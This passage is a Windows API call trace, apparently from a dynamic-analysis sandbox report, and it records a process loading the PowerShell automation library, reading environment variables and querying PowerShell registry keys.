	[0330.915] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x3d2560, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0330.916] CoTaskMemFree (pv=0x3d2560) 
	[0330.916] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.916] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.916] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.918] GetCurrentProcessId () returned 0x9fc
	[0330.919] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.919] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.919] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.922] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd938 | out: phkResult=0x1cd938*=0x2e4) returned 0x0
	[0330.922] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd8bc, lpData=0x0, lpcbData=0x1cd8b8*=0x0 | out: lpType=0x1cd8bc*=0x1, lpData=0x0, lpcbData=0x1cd8b8*=0x56) returned 0x0
	[0330.922] CoTaskMemAlloc (cb=0x5a) returned 0x1b409eb0
	[0330.922] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd88c, lpData=0x1b409eb0, lpcbData=0x1cd888*=0x56 | out: lpType=0x1cd88c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd888*=0x56) returned 0x0
	[0330.922] CoTaskMemFree (pv=0x1b409eb0) 
	[0330.923] RegCloseKey (hKey=0x2e4) returned 0x0
	[0330.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.935] CoTaskMemAlloc (cb=0x104) returned 0x3d2560
	[0330.935] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0330.935] CoTaskMemFree (pv=0x3d2560) 
	[0330.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
